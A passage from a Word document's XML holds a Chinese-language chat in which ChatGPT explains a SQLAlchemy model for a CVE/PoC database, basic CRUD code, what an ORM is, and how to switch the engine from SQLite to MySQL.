          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DBPoc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的模型，它代表了数据库中的一个表。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">__tablename__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是表名，而每一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Column() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例是表中的一个字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661FE8DD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713565CF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Column() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数用于定义字段和字段的类型，可以接受许多参数以设置字段的属性，如是否为主键（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>primary_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、是否能为空（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nullable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、默认值（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）等。例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Column(Integer, primary_key=True) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就表示该字段的类型是整数，并且是主键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288FBC3F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D359514" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个模型的实例就对应着表中的一行数据。因此，你可以通过操作这个对象来对数据进行增删改查。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA4F216" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E81D53" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B998D9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个新的记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29904E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>new_poc = DBPoc(eid=1, cve='CVE-2021-1234', ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7491D826" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.add(new_poc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E2584" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1191E83C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258710E1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F3B5D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pocs = session.query(DBPoc).filter(DBPoc.cve == 'CVE-2021-1234').all()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB53E64" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502779D7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1579FC28" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>poc = session.query(DBPoc).filter(DBPoc.id == 1).first()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB5636" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>poc.cve = 'CVE-2021-5678'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB71AA1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D855121" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E863323" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D647884" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>poc = session.query(DBPoc).filter(DBPoc.id == 1).first()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22703FA4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.delete(poc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47462855" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69860FBB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57166461" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，所有的数据库操作都需要在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的上下文中进行，并且在完成操作后，需要调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> commit() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来提交更改。如果你忘记了调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> commit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么更改将不会被保存到数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1115C937" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD4ECA5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个强大的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具，提供了丰富的功能，你可以在官方文档中了解更多：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">https://docs.sqlalchemy.org/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0287291F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16414010" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么意思</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60436953" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152C78E3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662646DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object-Relational Mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（对象关系映射）的简称，它是一种程序设计技术，用于实现面向对象编程语言里的对象与关系数据库的数据之间的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579D1DE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D753154" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在编程过程中，我们经常需要处理两种不同类型的系统：面向对象的系统（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等编程语言）和关系型数据库（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）。这两种系统在处理数据的方式上有很大的差异。面向对象的系统中，数据是以对象的形式存在的，对象可以有属性（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和方法（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。而在关系型数据库中，数据以表格的形式存储，表格中的每一行就是一条记录，每一列就是一个字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F22AC5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5FBDCD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了解决这两种系统之间的冲突，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术被发明出来。它允许我们在面向对象编程语言中使用类和对象的方式来操作数据库，而不需要直接编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的帮助下，一个类对应数据库中的一个表，类的一个实例对应表中的一条记录，类的属性对应表的字段，这样就建立了对象和关系之间的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60015370" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEAD418" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具有许多优点，例如，可以提高开发效率，代码更加简洁，可读性更强，更容易维护。同时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具也通常提供了一些高级功能，如事务管理、懒加载、缓存等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D75F7B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576C573" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlalchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中我想更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">self.engine = create_engine('sqlite:///exploit_db.sqlite', echo=False) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不想连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我想连接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6881CFD3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570EC604" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCF64A9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果你想将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库，你需要更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> create_engine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的参数。这里是一个基本的示例，说明如何连接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B55A619" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD1ECEA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437AB323" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy import create_engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55370F4B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C529852" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>self.engine = create_engine(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA6718" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    'mysql+pymysql://username:password@localhost/dbname',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41CD5F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    echo=False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70A48E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E65BCEB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000D5B57" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个示例中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B75D586" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128D4303" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50507639" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：你的</w:t>
      </w:r>
      <w:r>
